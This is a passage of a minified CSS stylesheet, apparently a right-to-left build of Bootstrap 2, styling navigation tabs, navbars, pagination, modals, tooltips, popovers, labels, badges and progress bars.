.active > a:hover, .tabs-below > .nav-tabs > .active > a:focus { border-color: transparent #ddd #ddd #ddd; } .tabs-left > .nav-tabs > li, .tabs-right > .nav-tabs > li { float: none; } .tabs-left > .nav-tabs > li > a, .tabs-right > .nav-tabs > li > a { min-width: 74px; margin-left: 0; margin-bottom: 3px; } .tabs-left > .nav-tabs { float: right; margin-left: 19px; border-left: 1px solid #ddd; } .tabs-left > .nav-tabs > li > a { margin-left: -1px; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .tabs-left > .nav-tabs > li > a:hover, .tabs-left > .nav-tabs > li > a:focus { border-color: #eee #eee #eee #ddd; } .tabs-left > .nav-tabs .active > a, .tabs-left > .nav-tabs .active > a:hover, .tabs-left > .nav-tabs .active > a:focus { border-color: #ddd #ddd #ddd transparent; *border-left-color: #fff; } .tabs-right > .nav-tabs { float: left; margin-right: 19px; border-right: 1px solid #ddd; } .tabs-right > .nav-tabs > li > a { margin-right: -1px; -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .tabs-right > .nav-tabs > li > a:hover, .tabs-right > .nav-tabs > li > a:focus { border-color: #eee #ddd #eee #eee; } .tabs-right > .nav-tabs .active > a, .tabs-right > .nav-tabs .active > a:hover, .tabs-right > .nav-tabs .active > a:focus { border-color: #ddd transparent #ddd #ddd; *border-right-color: #fff; } .nav > .disabled > a { color: #999; } .nav > .disabled > a:hover, .nav > .disabled > a:focus { text-decoration: none; background-color: transparent; cursor: default; } .navbar { overflow: visible; margin-bottom: 20px; *position: relative; *z-index: 2; } .navbar-inner { min-height: 40px; padding-right: 20px; padding-left: 20px; background-color: #f5f5f5; background-image: -moz-linear-gradient(top,#ffffff,#e6e6e6); background-image: -webkit-gradient(linear,0 0,0 100%,from(#ffffff),to(#e6e6e6)); background-image: -webkit-linear-gradient(top,#ffffff,#e6e6e6); background-image: -o-linear-gradient(top,#ffffff,#e6e6e6); background-image: linear-gradient(to bottom,#ffffff,#e6e6e6); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#ffe5e5e5', GradientType=0); border: 1px solid #c7c7c7; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 4px rgba(0,0,0,0.065); -moz-box-shadow: 0 1px 4px rgba(0,0,0,0.065); box-shadow: 0 1px 4px rgba(0,0,0,0.065); *zoom: 1; } .navbar-inner:before, .navbar-inner:after { display: table; content: ""; line-height: 0; } .navbar-inner:after { clear: both; } .navbar .container { width: auto; } .nav-collapse.collapse { height: auto; overflow: visible; } .navbar .brand { float: right; display: block; padding: 10px 20px 10px; margin-right: -20px; font-size: 20px; font-weight: 200; color: #666; text-shadow: 0 1px 0 #ffffff; } .navbar .brand:hover, .navbar .brand:focus { text-decoration: none; } .navbar-text { margin-bottom: 0; line-height: 40px; color: #666; } .navbar-link { color: #666; } .navbar-link:hover, .navbar-link:focus { color: #222; } .navbar .divider-vertical { height: 40px; margin: 0 9px; border-right: 1px solid #e6e6e6; border-left: 1px solid #ffffff; } .navbar .btn, .navbar .btn-group { margin-top: 5px; } .navbar .btn-group .btn, .navbar .input-prepend .btn, .navbar .input-append .btn, .navbar .input-prepend .btn-group, .navbar .input-append .btn-group { margin-top: 0; } .navbar-form { margin-bottom: 0; *zoom: 1; } .navbar-form:before, .navbar-form:after { display: table; content: ""; line-height: 0; } .navbar-form:after { clear: both; } .navbar-form input, .navbar-form select, .navbar-form .radio, .navbar-form .checkbox { margin-top: 5px; } .navbar-form input, .navbar-form select, .navbar-form .btn { display: inline-block; margin-bottom: 0; } .navbar-form input[type="image"], .navbar-form input[type="checkbox"], .navbar-form input[type="radio"] { margin-top: 3px; } .navbar-form .input-append, .navbar-form .input-prepend { margin-top: 5px; white-space: nowrap; } .navbar-form .input-append input, .navbar-form .input-prepend input { margin-top: 0; } .navbar-search { position: relative; float: right; margin-top: 5px; margin-bottom: 0; } .navbar-search .search-query { margin-bottom: 0; padding: 4px 14px; font-family: sans-serif; font-size: 13px; font-weight: normal; line-height: 1; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .navbar-static-top { position: static; margin-bottom: 0; } .navbar-static-top .navbar-inner { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; left: 0; right: 0; z-index: 1030; margin-bottom: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { border-width: 0 0 1px; } .navbar-fixed-bottom .navbar-inner { border-width: 1px 0 0; } .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner { padding-right: 0; padding-left: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 938px; } .navbar-fixed-top { top: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { -webkit-box-shadow: 0 1px 10px rgba(0,0,0,.1); -moz-box-shadow: 0 1px 10px rgba(0,0,0,.1); box-shadow: 0 1px 10px rgba(0,0,0,.1); } .navbar-fixed-bottom { bottom: 0; } .navbar-fixed-bottom .navbar-inner { -webkit-box-shadow: 0 -1px 10px rgba(0,0,0,.1); -moz-box-shadow: 0 -1px 10px rgba(0,0,0,.1); box-shadow: 0 -1px 10px rgba(0,0,0,.1); } .navbar .nav { position: relative; right: 0; display: block; float: right; margin: 0 0 0 10px; } .navbar .nav.pull-right { float: left; margin-left: 0; } .navbar .nav > li { float: right; } .navbar .nav > li > a { float: none; padding: 10px 15px 10px; color: #666; text-decoration: none; text-shadow: 0 1px 0 #ffffff; } .navbar .nav .dropdown-toggle .caret { margin-top: 8px; } .navbar .nav > li > a:focus, .navbar .nav > li > a:hover { background-color: #eee; color: #222; text-decoration: none; } .navbar .nav > .active > a, .navbar .nav > .active > a:hover, .navbar .nav > .active > a:focus { color: #fff; text-decoration: none; background-color: #1ba1e2; -webkit-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125); -moz-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125); box-shadow: inset 0 3px 8px rgba(0,0,0,0.125); } .navbar .btn-navbar { display: none; float: left; padding: 7px 10px; margin-right: 5px; margin-left: 5px; color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #e8e8e8; background-image: -moz-linear-gradient(top,#f2f2f2,#d9d9d9); background-image: -webkit-gradient(linear,0 0,0 100%,from(#f2f2f2),to(#d9d9d9)); background-image: -webkit-linear-gradient(top,#f2f2f2,#d9d9d9); background-image: -o-linear-gradient(top,#f2f2f2,#d9d9d9); background-image: linear-gradient(to bottom,#f2f2f2,#d9d9d9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2f2f2', endColorstr='#ffd8d8d8', GradientType=0); border-color: #d9d9d9 #d9d9d9 #b3b3b3; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #d9d9d9; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); } .navbar .btn-navbar:hover, .navbar .btn-navbar:focus, .navbar .btn-navbar:active, .navbar .btn-navbar.active, .navbar .btn-navbar.disabled, .navbar .btn-navbar[disabled] { color: #fff; background-color: #d9d9d9; *background-color: #cccccc; } .navbar .btn-navbar:active, .navbar .btn-navbar.active { background-color: #bfbfbf \9; } .navbar .btn-navbar .icon-bar { display: block; width: 18px; height: 2px; background-color: #f5f5f5; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-box-shadow: 0 1px 0 rgba(0,0,0,0.25); -moz-box-shadow: 0 1px 0 rgba(0,0,0,0.25); box-shadow: 0 1px 0 rgba(0,0,0,0.25); } .btn-navbar .icon-bar + .icon-bar { margin-top: 3px; } .navbar .nav > li > .dropdown-menu:before { content: ''; display: inline-block; border-right: 7px solid transparent; border-left: 7px solid transparent; border-bottom: 7px solid #ccc; border-bottom-color: rgba(0,0,0,0.2); position: absolute; top: -7px; right: 9px; } .navbar .nav > li > .dropdown-menu:after { content: ''; display: inline-block; border-right: 6px solid transparent; border-left: 6px solid transparent; border-bottom: 6px solid #fff; position: absolute; top: -6px; right: 10px; } .navbar-fixed-bottom .nav > li > .dropdown-menu:before { border-top: 7px solid #ccc; border-top-color: rgba(0,0,0,0.2); border-bottom: 0; bottom: -7px; top: auto; } .navbar-fixed-bottom .nav > li > .dropdown-menu:after { border-top: 6px solid #fff; border-bottom: 0; bottom: -6px; top: auto; } .navbar .nav li.dropdown > a:hover .caret, .navbar .nav li.dropdown > a:focus .caret { border-top-color: #222; border-bottom-color: #222; } .navbar .nav li.dropdown.open > .dropdown-toggle, .navbar .nav li.dropdown.active > .dropdown-toggle, .navbar .nav li.dropdown.open.active > .dropdown-toggle { background-color: #1ba1e2; color: #fff; } .navbar .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #666; border-bottom-color: #666; } .navbar .nav li.dropdown.open > .dropdown-toggle .caret, .navbar .nav li.dropdown.active > .dropdown-toggle .caret, .navbar .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #fff; border-bottom-color: #fff; } .navbar .pull-right > li > .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right { right: auto; left: 0; } .navbar .pull-right > li > .dropdown-menu:before, .navbar .nav > li > .dropdown-menu.pull-right:before { right: auto; left: 12px; } .navbar .pull-right > li > .dropdown-menu:after, .navbar .nav > li > .dropdown-menu.pull-right:after { right: auto; left: 13px; } .navbar .pull-right > li > .dropdown-menu .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu { right: auto; left: 100%; margin-right: 0; margin-left: -1px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; } .navbar-inverse .navbar-inner { background-color: #1b1b1b; background-image: -moz-linear-gradient(top,#222222,#111111); background-image: -webkit-gradient(linear,0 0,0 100%,from(#222222),to(#111111)); background-image: -webkit-linear-gradient(top,#222222,#111111); background-image: -o-linear-gradient(top,#222222,#111111); background-image: linear-gradient(to bottom,#222222,#111111); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff111111', GradientType=0); border-color: #252525; } .navbar-inverse .brand, .navbar-inverse .nav > li > a { color: #999; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); } .navbar-inverse .brand:hover, .navbar-inverse .brand:focus, .navbar-inverse .nav > li > a:hover, .navbar-inverse .nav > li > a:focus { color: #fff; } .navbar-inverse .brand { color: #999; } .navbar-inverse .navbar-text { color: #999; } .navbar-inverse .nav > li > a:focus, .navbar-inverse .nav > li > a:hover { background-color: transparent; color: #fff; } .navbar-inverse .nav .active > a, .navbar-inverse .nav .active > a:hover, .navbar-inverse .nav .active > a:focus { color: #fff; background-color: #111111; } .navbar-inverse .navbar-link { color: #999; } .navbar-inverse .navbar-link:hover, .navbar-inverse .navbar-link:focus { color: #fff; } .navbar-inverse .divider-vertical { border-right-color: #111111; border-left-color: #222222; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle { background-color: #111111; color: #fff; } .navbar-inverse .nav li.dropdown > a:hover .caret, .navbar-inverse .nav li.dropdown > a:focus .caret { border-top-color: #fff; border-bottom-color: #fff; } .navbar-inverse .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #999; border-bottom-color: #999; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #fff; border-bottom-color: #fff; } .navbar-inverse .navbar-search .search-query { color: #fff; background-color: #515151; border-color: #111111; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; } .navbar-inverse .navbar-search .search-query:-moz-placeholder { color: #ccc; } .navbar-inverse .navbar-search .search-query:-ms-input-placeholder { color: #ccc; } .navbar-inverse .navbar-search .search-query::-webkit-input-placeholder { color: #ccc; } .navbar-inverse .navbar-search .search-query:focus, .navbar-inverse .navbar-search .search-query.focused { padding: 5px 15px; color: #444; text-shadow: 0 1px 0 #fff; background-color: #fff; border: 0; -webkit-box-shadow: 0 0 3px rgba(0,0,0,0.15); -moz-box-shadow: 0 0 3px rgba(0,0,0,0.15); box-shadow: 0 0 3px rgba(0,0,0,0.15); outline: 0; } .navbar-inverse .btn-navbar { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #0e0e0e; background-image: -moz-linear-gradient(top,#151515,#040404); background-image: -webkit-gradient(linear,0 0,0 100%,from(#151515),to(#040404)); background-image: -webkit-linear-gradient(top,#151515,#040404); background-image: -o-linear-gradient(top,#151515,#040404); background-image: linear-gradient(to bottom,#151515,#040404); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff151515', endColorstr='#ff040404', GradientType=0); border-color: #040404 #040404 #000000; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #040404; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .navbar-inverse .btn-navbar:hover, .navbar-inverse .btn-navbar:focus, .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active, .navbar-inverse .btn-navbar.disabled, .navbar-inverse .btn-navbar[disabled] { color: #fff; background-color: #040404; *background-color: #000000; } .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active { background-color: #000000 \9; } .breadcrumb { padding: 8px 15px; margin: 0 0 20px; list-style: none; background-color: #f5f5f5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .breadcrumb > li { display: inline-block; *display: inline; *zoom: 1; text-shadow: 0 1px 0 #fff; } .breadcrumb > li > .divider { padding: 0 5px; color: #ccc; } .breadcrumb > .active { color: #999; } .pagination { margin: 20px 0; } .pagination ul { display: inline-block; *display: inline; *zoom: 1; margin-right: 0; margin-bottom: 0; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.05); -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.05); box-shadow: 0 1px 2px rgba(0,0,0,0.05); } .pagination ul > li { display: inline; } .pagination ul > li > a, .pagination ul > li > span { float: right; padding: 4px 12px; line-height: 20px; text-decoration: none; background-color: #fff; border: 1px solid #ddd; border-right-width: 0; } .pagination ul > li > a:hover, .pagination ul > li > a:focus, .pagination ul > .active > a, .pagination ul > .active > span { background-color: #f5f5f5; } .pagination ul > .active > a, .pagination ul > .active > span { color: #999; cursor: default; } .pagination ul > .disabled > span, .pagination ul > .disabled > a, .pagination ul > .disabled > a:hover, .pagination ul > .disabled > a:focus { color: #999; background-color: transparent; cursor: default; } .pagination ul > li:first-child > a, .pagination ul > li:first-child > span { border-right-width: 1px; -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; } .pagination ul > li:last-child > a, .pagination ul > li:last-child > span { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; } .pagination-centered { text-align: center; } .pagination-right { text-align: left; } .pagination-large ul > li > a, .pagination-large ul > li > span { padding: 11px 19px; font-size: 16.25px; } .pagination-large ul > li:first-child > a, .pagination-large ul > li:first-child > span { -webkit-border-top-right-radius: 6px; -moz-border-radius-topright: 6px; border-top-right-radius: 6px; -webkit-border-bottom-right-radius: 6px; -moz-border-radius-bottomright: 6px; border-bottom-right-radius: 6px; } .pagination-large ul > li:last-child > a, .pagination-large ul > li:last-child > span { -webkit-border-top-left-radius: 6px; -moz-border-radius-topleft: 6px; border-top-left-radius: 6px; -webkit-border-bottom-left-radius: 6px; -moz-border-radius-bottomleft: 6px; border-bottom-left-radius: 6px; } .pagination-mini ul > li:first-child > a, .pagination-mini ul > li:first-child > span, .pagination-small ul > li:first-child > a, .pagination-small ul > li:first-child > span { -webkit-border-top-right-radius: 3px; -moz-border-radius-topright: 3px; border-top-right-radius: 3px; -webkit-border-bottom-right-radius: 3px; -moz-border-radius-bottomright: 3px; border-bottom-right-radius: 3px; } .pagination-mini ul > li:last-child > a, .pagination-mini ul > li:last-child > span, .pagination-small ul > li:last-child > a, .pagination-small ul > li:last-child > span { -webkit-border-top-left-radius: 3px; -moz-border-radius-topleft: 3px; border-top-left-radius: 3px; -webkit-border-bottom-left-radius: 3px; -moz-border-radius-bottomleft: 3px; border-bottom-left-radius: 3px; } .pagination-small ul > li > a, .pagination-small ul > li > span { padding: 2px 10px; font-size: 11.05px; } .pagination-mini ul > li > a, .pagination-mini ul > li > span { padding: 0 6px; font-size: 9.75px; } .pager { margin: 20px 0; list-style: none; text-align: center; *zoom: 1; } .pager:before, .pager:after { display: table; content: ""; line-height: 0; } .pager:after { clear: both; } .pager li { display: inline; } .pager li > a, .pager li > span { display: inline-block; padding: 5px 14px; background-color: #fff; border: 1px solid #ddd; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: #f5f5f5; } .pager .next > a, .pager .next > span { float: left; } .pager .previous > a, .pager .previous > span { float: right; } .pager .disabled > a, .pager .disabled > a:hover, .pager .disabled > a:focus, .pager .disabled > span { color: #999; background-color: #fff; cursor: default; } .modal-backdrop { position: fixed; top: 0; left: 0; bottom: 0; right: 0; z-index: 1040; background-color: #000; } .modal-backdrop.fade { opacity: 0; } .modal-backdrop, .modal-backdrop.fade.in { opacity: 0.8; filter: alpha(opacity=80); } .modal { position: fixed; top: 10%; right: 50%; z-index: 1050; width: 560px; margin-right: -280px; background-color: #fff; border: 1px solid #999; border: 1px solid rgba(0,0,0,0.3); *border: 1px solid #999; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 3px 7px rgba(0,0,0,0.3); -moz-box-shadow: 0 3px 7px rgba(0,0,0,0.3); box-shadow: 0 3px 7px rgba(0,0,0,0.3); -webkit-background-clip: padding-box; -moz-background-clip: padding-box; background-clip: padding-box; outline: none; } .modal.fade { -webkit-transition: opacity .3s linear, top .3s ease-out; -moz-transition: opacity .3s linear, top .3s ease-out; -o-transition: opacity .3s linear, top .3s ease-out; transition: opacity .3s linear, top .3s ease-out; top: -25%; } .modal.fade.in { top: 10%; } .modal-header { padding: 9px 15px; border-bottom: 1px solid #eee; } .modal-header .close { margin-top: 2px; } .modal-header h3 { margin: 0; line-height: 30px; } .modal-body { position: relative; overflow-y: auto; max-height: 400px; padding: 15px; } .modal-form { margin-bottom: 0; } .modal-footer { padding: 14px 15px 15px; margin-bottom: 0; text-align: left; background-color: #f5f5f5; border-top: 1px solid #ddd; -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; -webkit-box-shadow: inset 0 1px 0 #fff; -moz-box-shadow: inset 0 1px 0 #fff; box-shadow: inset 0 1px 0 #fff; *zoom: 1; } .modal-footer:before, .modal-footer:after { display: table; content: ""; line-height: 0; } .modal-footer:after { clear: both; } .modal-footer .btn + .btn { margin-right: 5px; margin-bottom: 0; } .modal-footer .btn-group .btn + .btn { margin-right: -1px; } .modal-footer .btn-block + .btn-block { margin-right: 0; } .tooltip { position: absolute; z-index: 1030; display: block; visibility: visible; font-size: 11px; line-height: 1.4; opacity: 0; filter: alpha(opacity=0); } .tooltip.in { opacity: 0.8; filter: alpha(opacity=80); } .tooltip.top { margin-top: -3px; padding: 5px 0; } .tooltip.right { margin-right: 3px; padding: 0 5px; } .tooltip.bottom { margin-top: 3px; padding: 5px 0; } .tooltip.left { margin-right: -3px; padding: 0 5px; } .tooltip-inner { max-width: 200px; padding: 8px; color: #fff; text-align: center; text-decoration: none; background-color: #000; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; right: 50%; margin-right: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.right .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000; } .tooltip.left .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000; } .tooltip.bottom .tooltip-arrow { top: 0; right: 50%; margin-right: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .popover { position: absolute; top: 0; right: 0; z-index: 1010; display: none; max-width: 276px; padding: 1px; text-align: right; background-color: #fff; -webkit-background-clip: padding-box; -moz-background-clip: padding; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0,0,0,0.2); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2); -moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2); box-shadow: 0 5px 10px rgba(0,0,0,0.2); white-space: normal; } .popover.top { margin-top: -10px; } .popover.right { margin-right: 10px; } .popover.bottom { margin-top: 10px; } .popover.left { margin-right: -10px; } .popover-title { margin: 0; padding: 8px 14px; font-size: 14px; font-weight: normal; line-height: 18px; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; -webkit-border-radius: 5px 5px 0 0; -moz-border-radius: 5px 5px 0 0; border-radius: 5px 5px 0 0; -webkit-border-radius: 5px 5px 0 0; -moz-border-radius: 5px 5px 0 0; border-radius: 5px 5px 0 0; } .popover-title:empty { display: none; } .popover-content { padding: 9px 14px; } .popover .arrow, .popover .arrow:after { position: absolute; display: block; width: 0; height: 0; border-color: transparent; border-style: solid; } .popover .arrow { border-width: 11px; } .popover .arrow:after { border-width: 10px; content: ""; } .popover.top .arrow { right: 50%; margin-right: -11px; border-bottom-width: 0; border-top-color: #999; border-top-color: rgba(0,0,0,0.25); bottom: -11px; } .popover.top .arrow:after { bottom: 1px; margin-right: -10px; border-bottom-width: 0; border-top-color: #fff; } .popover.right .arrow { top: 50%; right: -11px; margin-top: -11px; border-right-width: 0; border-left-color: #999; border-left-color: rgba(0,0,0,0.25); } .popover.right .arrow:after { right: 1px; bottom: -10px; border-right-width: 0; border-left-color: #fff; } .popover.bottom .arrow { right: 50%; margin-right: -11px; border-top-width: 0; border-bottom-color: #999; border-bottom-color: rgba(0,0,0,0.25); top: -11px; } .popover.bottom .arrow:after { top: 1px; margin-right: -10px; border-top-width: 0; border-bottom-color: #fff; } .popover.left .arrow { top: 50%; left: -11px; margin-top: -11px; border-left-width: 0; border-right-color: #999; border-right-color: rgba(0,0,0,0.25); } .popover.left .arrow:after { left: 1px; border-left-width: 0; border-right-color: #fff; bottom: -10px; } .media, .media-body { overflow: hidden; *overflow: visible; zoom: 1; } .media, .media .media { margin-top: 15px; } .media:first-child { margin-top: 0; } .media-object { display: block; } .media-heading { margin: 0 0 5px; } .media > .pull-left { margin-left: 10px; } .media > .pull-right { margin-right: 10px; } .media-list { margin-right: 0; list-style: none; } .label, .badge { display: inline-block; padding: 2px 4px; font-size: 10.998px; font-weight: bold; line-height: 14px; color: #fff; vertical-align: baseline; white-space: nowrap; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #999; } .label { -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .badge { padding-right: 9px; padding-left: 9px; -webkit-border-radius: 9px; -moz-border-radius: 9px; border-radius: 9px; -webkit-border-radius: 9px; -moz-border-radius: 9px; border-radius: 9px; } .label:empty, .badge:empty { display: none; } a.label:hover, a.label:focus, a.badge:hover, a.badge:focus { color: #fff; text-decoration: none; cursor: pointer; } .label-important, .badge-important { background-color: #b94a48; } .label-important[href], .badge-important[href] { background-color: #953b39; } .label-warning, .badge-warning { background-color: #d9532d; } .label-warning[href], .badge-warning[href] { background-color: #b34120; } .label-success, .badge-success { background-color: #468847; } .label-success[href], .badge-success[href] { background-color: #356635; } .label-info, .badge-info { background-color: #3a87ad; } .label-info[href], .badge-info[href] { background-color: #2d6987; } .label-inverse, .badge-inverse { background-color: #444; } .label-inverse[href], .badge-inverse[href] { background-color: #2b2b2b; } .btn .label, .btn .badge { position: relative; top: -1px; } .btn-mini .label, .btn-mini .badge { top: 0; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 100% 0; } } @-moz-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 100% 0; } } @-ms-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 100% 0; } } @-o-keyframes progress-bar-stripes { from { background-position: 100% 0; } to { background-position: 40px 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 100% 0; } } .progress { overflow: hidden; height: 20px; margin-bottom: 20px; background-color: #f7f7f7; background-image: -moz-linear-gradient(top,#f5f5f5,#f9f9f9); background-image: -webkit-gradient(linear,0 0,0 100%,from(#f5f5f5),to(#f9f9f9)); background-image: -webkit-linear-gradient(top,#f5f5f5,#f9f9f9); background-image: -o-linear-gradient(top,#f5f5f5,#f9f9f9); background-image: linear-gradient(to bottom,#f5f5f5,#f9f9f9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#fff9f9f9', GradientType=0); -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .progress .bar { width: 0%; height: 100%; color: #fff; float: right; font-size: 12px; text-align: center; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #0e90d2; background-image: -moz-linear-gradient(top,#149bdf,#0480be); background-image: -webkit-gradient(linear,0 0,0 100%,from(#149bdf),to(#0480be)); background-image: -webkit-linear-gradient(top,#149bdf,#0480be); background-image: -o-linear-gradient(top,#149bdf,#0480be); background-image: linear-gradient(to bottom,#149bdf,#0480be); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff149bdf', endColorstr='#ff0480be', GradientType=0); -webkit-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15); -moz-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15); box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15); -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; -webkit-transition: width .6s ease; -moz-transition: width .6s ease; -o-transition: width .6s ease; transition: width .6s ease; } .progress .bar + .bar { -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); -moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15); } .progress-striped .bar { background-color: #149bdf; background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent)); background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 